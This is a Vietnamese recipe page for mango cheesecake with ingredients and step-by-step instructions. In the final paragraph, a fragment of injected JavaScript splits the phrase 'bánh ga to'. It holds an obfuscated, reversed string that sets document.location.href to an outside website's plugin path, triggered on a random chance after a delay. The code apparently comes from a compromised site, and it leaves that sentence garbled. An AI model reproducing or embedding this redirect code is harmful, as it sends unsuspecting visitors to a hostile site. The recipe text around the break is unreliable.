Cách làm bánh Cheesecake Xoài (bánh phô mai xoài)

Bánh cheesecake Xoài
Bánh phô mai (cheesecake) Xoài là một món ngon và bắt mắt. Với vị chua chua ngọt ngọt sẽ làm kích thích vị giác của bạn, hãy cùng trổ tài để làm cho người thân yêu của mình nhé.

Những nguyên liệu để học làm bánh
Phần bánh:
– 300g creamcheese
– 250g sữa chua
– 200g xoài nghiền
– Một ít xoài cắt hạt lựu
– 70g sữa
– 10g lá gelatin
– 250g whipping cream
– 60g đường
Phần mặt bánh:
– 50g nước cam
– 2.5g lá gelatin
Cách làm bánh
Bước 1:
Cho creamcheese và sữa chua vào tô lớn, đun cách thủy cho tan.
Bước 2:
Xoài gọt vỏ cắt miếng. Một phần nhỏ bạn cắt miếng vuông cỡ 1cm để riêng để trang trí sau, phần còn lại bạn cắt miếng lớn hơn để làm cốt bánh, cho vào máy xay xay nhuyễn rồi cân lấy 200g xoài xay.
Bước 3:
Đánh bông kem tươi với đường.
Ngâm gelatin trong nước lạnh cho mềm rồi thêm sữa vào và cũng đun cách thủy cho gelatin tan đều hết.
Bước 4:
Cho xoài nghiền vào phần hỗn hợp creamcheese ở bước 1, rồi cho vào máy xay sinh tố xay đều. Sau khi xay xong bạn đổ qua rây lọc.

Thêm phần sữa gelatin cùng kem tươi ở bước 3 vào.
Bước 5:
Đổ phần hỗn hợp bạn vừa trộn vào đầy 1/3 khuôn, trang trí với xoài cắt miếng vuông ở xung quanh và ở giữa khuôn.
Kế đến bạn đổ tiếp phần hỗn hợp còn lại vào đầy 2/3 khuôn.
Rồi lại cho thêm một lớp xoài cắt hạt lựu lên
Và đổ thêm một lớp hỗn hợp đến gần đầy khuôn, chừa một khoảng nhỏ để đổ phần mặt bánh. Cho bánh vào ngăn mát tủ lạnh khoảng 4 tiếng trở lên.
Phần mặt bánh thì bạn chỉ việc ngâm gelatin cho mềm, sau đó cho vào phần nước cam đã chuẩn bị, đun cách thủy cho gelatin tan hết, để nguội bớt rồi đổ lên mặt bánh cho đầy khuôn rồi giữ lạnh thêm khoảng 4 tiếng nữa là được.
Nếu thích làm bánh cheesecake “đúng kiểu” bạn cũng có thể lót một lát bánh ga toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} to sẵn ở trong khuôn, sau đó hãy đổ hỗn hợp cheese vào cũng được. Để phần bánh và mặt bánh có được màu sắc đẹp mắt thì bạn canh liều lượng xoài cho vào xay vừa phải thôi để màu bánh không đậm quá, sau khi kết hợp với màu cam của mặt bánh sẽ đẹp hơn nhiều.

Sưu tầm